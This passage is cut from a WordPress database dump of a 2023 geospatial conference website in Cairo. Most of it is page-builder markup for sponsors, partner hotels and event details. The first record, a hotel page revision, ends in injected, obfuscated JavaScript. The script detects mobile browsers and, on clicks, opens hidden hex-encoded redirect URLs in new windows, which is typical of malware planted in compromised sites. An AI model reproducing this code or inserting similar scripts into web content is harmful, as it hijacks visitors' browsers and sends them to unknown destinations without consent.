65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NOVOTEL CAIRO EL BORG','','inherit','closed','closed','','4729-revision-v1','','','2023-06-21 23:41:44','2023-06-21 23:41:44','',4729,'https://gsw2023.com/?p=4732',0,'revision','',0),
(4733,1,'2023-06-21 23:42:45','2023-06-21 23:42:45','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687389797868{margin-top: 10px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687389578407{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" width=\"281\" height=\"187\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" 